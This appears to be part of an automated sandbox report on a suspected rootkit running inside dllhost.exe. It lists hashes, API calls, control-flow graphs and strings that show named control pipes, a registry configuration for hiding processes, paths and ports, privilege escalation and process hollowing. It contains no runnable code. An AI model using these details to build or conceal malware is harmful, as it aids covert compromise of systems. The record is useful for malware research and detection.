                                                        • Instruction ID: 2ef3b413823c79878d8bf4f714f1222c243dd995f8c3498a775b877731f91f2a
                                                        • Opcode Fuzzy Hash: 5eedca2a6ebaa50de0a645c3a268b9ad974e8a0cc72b2613e158502b10b35cba
                                                        • Instruction Fuzzy Hash: 135157B27116808AEB66DF63F8587EA22A1F78DBD8F404025EF4957764DF38C5868704

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                        • String ID:
                                                        • API String ID: 3197395349-0
                                                        • Opcode ID: a824f9f1c73b8783bda4e66bfa56d47737030f3f51221f323701f0b802283d28
                                                        • Instruction ID: e0f80ed29c2beefa5853a1ece120277d3f59ab68b3310c2d3307c812b30976c9
                                                        • Opcode Fuzzy Hash: a824f9f1c73b8783bda4e66bfa56d47737030f3f51221f323701f0b802283d28
                                                        • Instruction Fuzzy Hash: 4D317CB2214791CAE761CF65F4807DE77A4F748798F40422AFB4947EA8DB78C258CB44

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-3864762265
                                                        • Opcode ID: 6fe6fd2fabdb69b81960e478b2bac1cdf4793581c5eb948de40915324fca4ae9
                                                        • Instruction ID: 4eaf67f6f9e92a82d90f2c5ff0c3a66959d997bd88fd83b2dd54c05b11918b05
                                                        • Opcode Fuzzy Hash: 6fe6fd2fabdb69b81960e478b2bac1cdf4793581c5eb948de40915324fca4ae9
                                                        • Instruction Fuzzy Hash: 6171C4B6210A5086EB22EF66F8507D923A4FB8CBC8F016125FB4D97A7ADF38C554C744

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                        • String ID: .text$C:\Windows\System32\
                                                        • API String ID: 2721474350-832442975
                                                        • Opcode ID: 16cf0cf07d351bfc07595f53eddcf13a68410e5df92f1070c1b95616c679785f
                                                        • Instruction ID: 382fdfafcf188df71275b01ec7f95dd2068c3ca20848ba32fea421f12bb9129c
                                                        • Opcode Fuzzy Hash: 16cf0cf07d351bfc07595f53eddcf13a68410e5df92f1070c1b95616c679785f
                                                        • Instruction Fuzzy Hash: 02516BB230468086EB62DF16F8587DAB7A1FB8CBD5F444215AF4A07BA8DF38D549C704

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                        • String ID: M$\\.\pipe\Deadchildproc
                                                        • API String ID: 2203880229-2467240567
                                                        • Opcode ID: c810db3489ad2119f9ef1fbae4b7a74286d7b5b92ae01f9e30bd790640addf01
                                                        • Instruction ID: c0028d3d0314667bf38e8ea026a80401a8df8d922a9ec9a1a2b92cbe9fa5a050
                                                        • Opcode Fuzzy Hash: c810db3489ad2119f9ef1fbae4b7a74286d7b5b92ae01f9e30bd790640addf01
                                                        • Instruction Fuzzy Hash: 171139F121868492E726EB22F8047E96764B78DBE0F444225FB9A436F6DF7CC548C704

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 208 140002cb8-140002cc2 209 140002cc5-140002cd8 call 1400022fc 208->209 212 140002ce5-140002cf2 ConnectNamedPipe 209->212 213 140002cda-140002ce3 Sleep 209->213 214 140002cf4-140002d15 ReadFile 212->214 215 140002d29-140002d2e Sleep 212->215 213->209 216 140002d34-140002d3d DisconnectNamedPipe 214->216 217 140002d17-140002d1c 214->217 215->216 216->212 217->216 218 140002d1e-140002d27 217->218 218->216
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                        • String ID: \\.\pipe\Deadcontrol
                                                        • API String ID: 2071455217-964892075
                                                        • Opcode ID: e22c166e277d37d8911ee3c90f5aefddfa50812562ee9ae4fe93c972e7b55e2b
                                                        • Instruction ID: 60e311c102fdf720ee8a3f99fe4f98fe53f16b407cae5fa6fe3443ad4e3daf5f
                                                        • Opcode Fuzzy Hash: e22c166e277d37d8911ee3c90f5aefddfa50812562ee9ae4fe93c972e7b55e2b
                                                        • Instruction Fuzzy Hash: ED0148B1204A4482FB16EB22F8147E96360A79DBE1F544225FB66436F5CE78C948CB00

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 228 14000363c-140003690 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 229 140003692-1400036a5 K32EnumProcesses 228->229 230 1400036a7-1400036b6 229->230 231 1400036ef-1400036f8 SleepEx 229->231 232 1400036b8-1400036bc 230->232 233 1400036e0-1400036eb 230->233 231->229 234 1400036be 232->234 235 1400036cf-1400036d2 call 140003198 232->235 233->231 236 1400036c2-1400036c7 234->236 239 1400036d6 235->239 237 1400036c9-1400036cd 236->237 238 1400036da-1400036de 236->238 237->235 237->236 238->232 238->233 239->238
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                        • String ID:
                                                        • API String ID: 3676546796-0
                                                        • Opcode ID: c96deb0488732d85c0e234732b40ab3daafc8955a2b60271e324f420789b4ec5
                                                        • Instruction ID: 932927f610c79799a7423f6de90e0e5c96436069bf88993b9f6edd8e186454c1
                                                        • Opcode Fuzzy Hash: c96deb0488732d85c0e234732b40ab3daafc8955a2b60271e324f420789b4ec5
                                                        • Instruction Fuzzy Hash: B81172B270061196E716DB17F81476A76A6F7C9FC1F558028EF8207B78CE3AD884CB00

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                        • String ID:
                                                        • API String ID: 1323846700-0
                                                        • Opcode ID: f7b66c7ddde02ce72e5708e93fa5b9cad22753f794ef07c2f3610d54e317b5ed
                                                        • Instruction ID: c4f78ba7dc92e043a2521667b0c692508f3cdd8a3ed11add7ef69fba4bbf15d1
                                                        • Opcode Fuzzy Hash: f7b66c7ddde02ce72e5708e93fa5b9cad22753f794ef07c2f3610d54e317b5ed
                                                        • Instruction Fuzzy Hash: FF114CB570564186EB16DB67B84439AA6A1EB8DBD1F188028FF490377BDE39C485C704

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 252 2e86a09da9c-2e86a09dab7 253 2e86a09daba-2e86a09dae3 252->253 254 2e86a09dae5-2e86a09daea 253->254 255 2e86a09daef-2e86a09daf8 253->255 256 2e86a09db7e-2e86a09db87 254->256 257 2e86a09db10 255->257 258 2e86a09dafa-2e86a09dafd 255->258 256->253 259 2e86a09db8d-2e86a09dba7 256->259 262 2e86a09db15-2e86a09db26 GetStdHandle 257->262 260 2e86a09db09-2e86a09db0e 258->260 261 2e86a09daff-2e86a09db07 258->261 260->262 261->262 263 2e86a09db33 262->263 264 2e86a09db28-2e86a09db31 GetFileType 262->264 265 2e86a09db35-2e86a09db37 263->265 264->265 266 2e86a09db59-2e86a09db71 265->266 267 2e86a09db39-2e86a09db44 265->267 266->256 270 2e86a09db73-2e86a09db77 266->270 268 2e86a09db46-2e86a09db4b 267->268 269 2e86a09db4d-2e86a09db50 267->269 268->256 269->256 271 2e86a09db52-2e86a09db57 269->271 270->256 271->256
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: FileHandleType
                                                        • String ID:
                                                        • API String ID: 3000768030-0
                                                        • Opcode ID: a491ebcf290257d12ec8eb837e4a16cf9b6865e49f739ff5ff245a9fe25edfaf
                                                        • Instruction ID: 436706d76f8b52eba31773ae64c79338f6f0bfa8fa8e18ad9762645036f6c95c
                                                        • Opcode Fuzzy Hash: a491ebcf290257d12ec8eb837e4a16cf9b6865e49f739ff5ff245a9fe25edfaf
                                                        • Instruction Fuzzy Hash: 2B31E222694B85D2EF608F14C49826966D8F745BB0F68234ADBEE273E0CF34D4E1D302
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000003.2003027264.000002E86A060000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002E86A060000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_3_2e86a060000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction ID: 35b76960a46ac52155cfa6132bc38b190faf8d6c67efaaafb3f3cabad21d6e6e
                                                        • Opcode Fuzzy Hash: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction Fuzzy Hash: 0B910172B412D0C7EF64CF25D148B69B39DF758BA8F5491A59E8E07788DE38D882C701

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 0000000140002D54: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002D7C
                                                          • Part of subcall function 0000000140002D54: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002D8C
                                                          • Part of subcall function 0000000140002D54: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002DA6
                                                          • Part of subcall function 0000000140002D54: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DBD
                                                          • Part of subcall function 0000000140002D54: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DF5
                                                          • Part of subcall function 0000000140002D54: GetLastError.KERNEL32 ref: 0000000140002DFF
                                                          • Part of subcall function 0000000140002D54: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E08
                                                          • Part of subcall function 0000000140002D54: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E31
                                                          • Part of subcall function 0000000140002D54: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E61
                                                          • Part of subcall function 0000000140002D54: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E91
                                                          • Part of subcall function 0000000140002D54: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EA5
                                                          • Part of subcall function 0000000140002D54: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EB3
                                                          • Part of subcall function 0000000140002D54: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EC6
                                                          • Part of subcall function 0000000140002D54: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002ED4
                                                        • ExitProcess.KERNEL32 ref: 0000000140002D4B
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                                        • String ID:
                                                        • API String ID: 2472495637-0
                                                        • Opcode ID: 6a20d8ef6d5d0a33946017a04688fae3853965e8bdf45be2cba163fde7849c19
                                                        • Instruction ID: 59e064767c250cdef6e9f59bcc282425e560d761e872fe105b4542e7c77ad29f
                                                        • Opcode Fuzzy Hash: 6a20d8ef6d5d0a33946017a04688fae3853965e8bdf45be2cba163fde7849c19
                                                        • Instruction Fuzzy Hash: E7A002B0A1159041DA09B77674553D91561575C741F100415611547172DD7844954655

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                                        • String ID: Deaddll32$Deaddll64$Deadstager$Deadsvc32$Deadsvc64$SOFTWARE$open
                                                        • API String ID: 4225498131-962349031
                                                        • Opcode ID: 450fa506a82a4360291a73bcf3c1966bc75cf997108b410fe434a52d5e732181
                                                        • Instruction ID: bee31f4bb4eca69dbc2064e24843e613eed87fcc0e5c67a3900ab23587beb8cd
                                                        • Opcode Fuzzy Hash: 450fa506a82a4360291a73bcf3c1966bc75cf997108b410fe434a52d5e732181
                                                        • Instruction Fuzzy Hash: 0AB139F1204A8096EB7BDF27F8543EA22A9F74C7C4F458125FB0A47AB5DE798645C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                        • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                        • API String ID: 1036100660-1371749706
                                                        • Opcode ID: 2ae28259712622d184201cd73a669a884a860a96c12e014958bbe065557aa5e1
                                                        • Instruction ID: 07848a9698b11e3d894769372e26ec50b4a2d47e9cb93284ff33e8dea5ca0528
                                                        • Opcode Fuzzy Hash: 2ae28259712622d184201cd73a669a884a860a96c12e014958bbe065557aa5e1
                                                        • Instruction Fuzzy Hash: BCD16EB670165187EB62DB67F84479AB7A0FB88BC4F004014EF8947BA4DF78D599CB04
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: ee98945699b493ad29f20a887b5fb4f589f7881d066e3db2e487dbd33c4d129b
                                                        • Instruction ID: 43922e32370d32dc73654900e2d3c725cb019758062c5c0b8a591c9e0bc80e85
                                                        • Opcode Fuzzy Hash: ee98945699b493ad29f20a887b5fb4f589f7881d066e3db2e487dbd33c4d129b
                                                        • Instruction Fuzzy Hash: AE5127B2604B8486EB16DF62F4483AA77A1F788BD9F444124EB4A07B79DF38C545C704
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction ID: a3ef9d63b5aebb4938eb00ecce4b407a00aca507731d76c20dd7420999df12ad
                                                        • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction Fuzzy Hash: 9D314C76245AC0CAEF608F60E8547DE7368F798744F44502ADB8E57B95DF38C588C711
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction ID: ad6781946adf8ad9da84d22255c40b826761354fad0033cc1628a1cfab091887
                                                        • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction Fuzzy Hash: EC316B36254B80C6EF208B25E88479EB3A8F789764F501156EA9D43BA9DF38C1858B01
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 1443284424-0
                                                        • Opcode ID: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction ID: c5170a04df0c4425d30fccf0a02dadffd25407b19dc1a0e6385cc815b63f03fc
                                                        • Opcode Fuzzy Hash: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction Fuzzy Hash: 4AE1DA62B58AC4CAEF00CF64D48829D7BB9F345788F148156DF8E57B9ADE38C896C701
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000003.2003027264.000002E86A060000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002E86A060000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_3_2e86a060000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936
                                                        • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction ID: c4433d23788f0fa9bc4922a32a35d42067d2402ff1a48462fdc438ddbe4a7116
                                                        • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction Fuzzy Hash: B451D3A27907E4C5EF10DFA6D808A9D27ECF759BD8F845521EE8D07B86DE38C0818301
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6443cbb4f478dc75769a01e0e5b16e240a4b2319269658760e585958f13e3c18
                                                        • Instruction ID: 4b364da67614e13366b8919093d8d584769c9c4ff1299579ad43355a02afaa43
                                                        • Opcode Fuzzy Hash: 6443cbb4f478dc75769a01e0e5b16e240a4b2319269658760e585958f13e3c18
                                                        • Instruction Fuzzy Hash: 0051F422B447D0D8FF208B76E80829E7BA9B741BE4F145255EEDD67A86CF38C581C701
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000003.2003027264.000002E86A060000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002E86A060000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_3_2e86a060000_dllhost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7f9f47fc1d1d00a15582ce0217e319e1a5c796af2aa1155442032cf22d2cb127
                                                        • Instruction ID: d955d708e997c5b798ef94acacbb184e180d42632487287c219de7a3bd1c7378
                                                        • Opcode Fuzzy Hash: 7f9f47fc1d1d00a15582ce0217e319e1a5c796af2aa1155442032cf22d2cb127
                                                        • Instruction Fuzzy Hash: 2BF062B1755294CAEFA48F28E8437697BE4F318384F808459D7CD83B15D63CC0A08F45

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmp
